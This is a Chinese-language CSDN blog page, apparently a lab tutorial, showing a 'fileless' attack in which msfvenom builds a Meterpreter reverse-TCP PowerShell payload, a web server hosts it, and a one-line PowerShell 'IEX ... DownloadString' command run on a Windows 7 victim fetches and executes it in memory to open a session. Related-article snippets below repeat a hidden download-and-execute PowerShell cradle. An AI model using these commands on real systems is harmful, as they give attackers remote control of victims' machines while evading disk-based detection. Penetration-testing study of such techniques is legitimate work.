Powershell 配合msf无文件攻击

最新推荐文章于 2025-03-01 13:48:59 发布
最新推荐文章于 2025-03-01 13:48:59 发布
阅读量1.8k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45382656/article/details/105787772
本文介绍了如何使用msfvenom生成Windows x64系统的Meterpreter反弹shell,然后利用PowerShell的反射执行机制,将恶意脚本下载到目标Win7系统中。通过在Kali Linux上设置监听,当受害者访问特定URL执行脚本时,攻击者成功获取了会话。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

生成木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135
LPORT=1121 -f psh-reflection >x.ps1

在这里插入图片描述

放到VPS上,这里我们放到本机搭建的apache环境中
在这里插入图片描述

kali设置监听,并且启动
在这里插入图片描述

win7中访问木马是否成功
在这里插入图片描述

直接在win7的cmd中执行命令

powershell IEX (New-Object
Net.WebClient).DownloadString(‘http://192.168.3.37/x.ps1’)

在这里插入图片描述

注意此窗口关闭就会话失效

监听到会话
在这里插入图片描述

最低0.47元/天 解锁文章

200万优质内容无限畅学
无文件攻击与病毒样本分析-1-4-3-无文件攻击之恶意脚本:Powershell
不忘初心,护天下安全!
07-15 1157
简要介绍无文件攻击powershell的发力点
文件落地攻击手法
墨痕诉清风的博客
04-28 450
文件落地攻击()是一种高级的网络攻击技术,它利用操作系统或应用程序的漏洞,通过在内存中运行恶意代码而不在受攻击系统上留下任何可检测的文件痕迹。与传统的恶意软件攻击不同,无文件攻击不需要依赖传统的恶意软件文件来实施攻击,从而增加了攻击的隐蔽性和成功率。无文件攻击通常利用合法的系统工具和功能,如PowerShellWMI)、注册表等,来执行恶意代码。攻击者可以通过操纵这些合法工具来加载和执行恶意代码,并将其驻留在受害系统的内存中。由于没有文件被写入磁盘,传统的防病毒软件和安全工具难以检测到这种类型的攻击。
2024HW --> 安全产品 && Powershell文件落地攻击
weixin_42340783的博客
04-26 552
在HW中,除了了解中间件,web漏洞,这些攻击的手法,还得了解应急响应,安全产品,入侵排查,溯源反制… 那么今天,就来说一下安全产品(安全公司我就不说了,这个大家都知道)
文件落地攻击
Fly_鹏程万里
11-10 1818
所谓的"无文件落地攻击"是指恶意程序文件不直接落地到目标系统的磁盘空间中的一种攻击手法,常用于逃避传统的安全检测机制,本篇文章将就此进行简要介绍几种目前比较流行的无文件落地攻击手法。
MSF-msfvenom Linux 无文件木马程序
枫梓林のBlog
04-21 1376
Linux 无文件木马程序 环境准备 文章目录Linux 无文件木马程序一、生成恶意文件二、启动Apache服务三、Vegile 使用四、获取Linux 系统的shell五、创建无文件后门程序 Kali Linux 2020.4 CentOS 7.6 IP地址 Kali Linux :192.168.37.139 CentOS :192.168.37.133 一、生成恶意文件 生成恶意文件让目标系统执行来获取 shell ┌──(root????fengzilin54)-[~] └─# msfve
恶意软件“八月”利用powershell进行无文件感染
weixin_34304013的博客
09-04 499
本文讲的是 恶意软件“八月”利用powershell进行无文件感染,Proofpoint安全研究专家提醒,一种叫做“八月”(August)的新型窃取信息恶意软件正利用Windows powershell脚本进行无文件感染并通过Word文档传播。 这个恶意软件是由高度个性化的TA530为载体来传播的,研究者表示,“八月”传播的目标是零售商的客服、管理人员...
MSF学习
willow_liang的博客
12-03 2100
目录 Metasploit模块 主机扫描 查找扫描模块 使用扫描模块 使用nmap扫描 搜索和使用samba的漏洞利用模块 后渗透攻击:信息收集 使用ms17-010对win7进行渗透 进程迁移 查看系统信息 截图 文件系统命令 权限提升 将meterpreter转换为后台执行 令牌窃取 hash攻击 或者上传pwdump,wce工具获取hash 使用mimikatz抓取密码 后渗透攻击:后门 1.Cymothoa后门 2.Persistence后门 3.w.
MSF及Unicorn的介绍及用法-漏洞银行大咖面对面7-hfuuss
09-05
MSF配合PowerShell使用,攻击者可以轻松地绕过安全防御措施,进行恶意操作。例如,PowerShell可以被用来加载和执行MSF生成的攻击载荷,这样的组合使用可以让攻击者在目标系统上执行任意代码,控制系统,甚至传播恶意...
msf生成payload并注入到可执行程序exe中
redwand的博客
07-22 5846
msfconsole下的generate与msfvomen命令实际是不同环境下的同一个命令,其功能基本相同,这里我们要学习的重点是使用-k -x 选项将payload注入到可以执行文件exe中,这项技能在实战中后渗透测试的可持久化中经常会被用到。
cs与msf权限传递以及mimikatz抓取win2012明文密码
weixin_72584149的博客
05-28 263
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。-p :指定要使用的有效载荷(–list payloads要列出的有效载荷,–list-options用于参数)。[options]:指定一些可选的参数,如输出格式、编码器、平台、架构、加密等(使用-h查看所有参数)。:指定有效载荷所需的变量和值,如LHOST、LPORT等。
LockBit3.0勒索病毒利用PowerShell无文件攻击技术
pandazhengzheng的博客
02-07 1391
LockBit3.0勒索病毒利用PowerShell无文件攻击技术
无文件攻击
why123wh的博客
02-16 3151
无文件攻击是一种高级持续性威胁(APT)的攻击方式,它不会在目标系统的磁盘上留下可执行文件,而是利用系统内置的工具或脚本执行恶意代码,从而绕过传统的安全防护措施。无文件攻击的最大特点就是恶意代码直接在内存中运行,难以被发现和清除。
cs powershell文件落地利用
课嗨教育的专栏
04-18 1834
目录 一、写入程序 二、cs powershell添加重启上线 三、应用程序添加重启上线 一、写入程序 cs powershellpowershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://39.108.128.1:801/a'))" 以易语言为例: 运行 (“powershell.exe -nop -w hidden -c ” + #引号 + “IEX ((new-
0x150 C2远控篇&PowerShell&有无文件落地&C#参数调用&绕AMSI&ETW&去混淆特征
最新发布
m0_74048540的博客
03-01 278
本文概述了 PowerShell 的上线技术。首先,通过 C# 生成 PowerShell Shellcode 并运行恶意脚本,需设置策略以允许运行脚本。除了文件落地的方式,还介绍了无文件落地的实现方法,如利用网络下载命令。为增强隐蔽性,阐述了文件与无文件落地的免杀技术,包括字符串混淆和特征修改。同时,强调了对抗 AMSI 接口的策略,以规避 AV 警报,从而提高 PowerShell 脚本的隐蔽性和有效性。
“无文件”攻击方式渗透实验
weixin_33972649的博客
03-16 505
拓扑设计   拓扑介绍 其中192.168.1.0/24模拟的是公网的环境 172.21.132.0/24模拟的是企业内网的环境 边界web服务器双网卡(公网的:192.168.1.110,和内网的172.21.132.110),而且为了最基本的安全保障,web边界服务器设置了防火墙,此防火墙对外网只开放80,81,443端口,对内网开放所有端口,上面还装有杀毒软件。 内网还布置若干台web服...
浅谈无文件落地攻击
errorr0
06-04 2990
文件落地攻击实现隐藏攻击
MSF 离线攻击
weixin_30656145的博客
08-03 422
MSF 离线攻击 MSF连环攻击在internet上实现是不太现实的,网络中的安全设备(防火墙、入侵检测、入侵防护系统)。 实验拓扑如下: 实验说明:安全实验中的包过滤防火墙在测试中使用的是linux iptables,上述拓扑中,攻击者的公网地址为61.67.1.100/24,而防火墙上的公网地址61.67.1.200/24 对内部主机192.168.1.0/24 做SNAT。...
MSF&Powershell进行钓鱼攻击
weixin_44508748的博客
04-26 2691
一、Powershell配合MSF无文件攻击 实验环境: 靶机:win 7 >192.168.1.9 攻击机:kali>192.168.1.7 web服务器:win 10 > 192.168.1.6 本次实验的大致过程如下: MSF生成payload并放到靶机能够访问的服务器上,攻击者通过钓鱼等方式使靶机执行powershell代码,靶机反弹到msf监听的端口上建立会话,由此攻击...
文件落地免杀的初尝试思考(上)
wjwqp的专栏
07-23 732
我们通过BarrettAdams师傅GitHub里面的代码分析,我们发现免杀的本质还是加密与混淆;我们通过底层函数的调用与"位图"的RNG隐藏躲避了def检测,那我们把这个数据流在进行Base64加密后执行呢?我们把这个数字流通过”+“或者函数拼接呢?又或者我们改用其他不那么敏感的函数调用呢?或者用音频或者视频隐写呢?因为笔者也是初次尝试无文件落地免杀,所以难免有一些疏漏。如果存在问题,欢迎大家在评论区指正。作者面包and牛奶,文章转载于FreeBuf.COMhttpshttpshttps。...
PowerPhish: Powershell 脚本实现网络钓鱼攻击
【标签】中的"PowerShell"是本文件的唯一标签,这表明文件中的内容与PowerShell脚本高度相关,并且专注于如何使用PowerShell脚本进行网络钓鱼攻击。标签在这里起到索引和分类的作用。 知识点七:文件名说明 【压缩...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值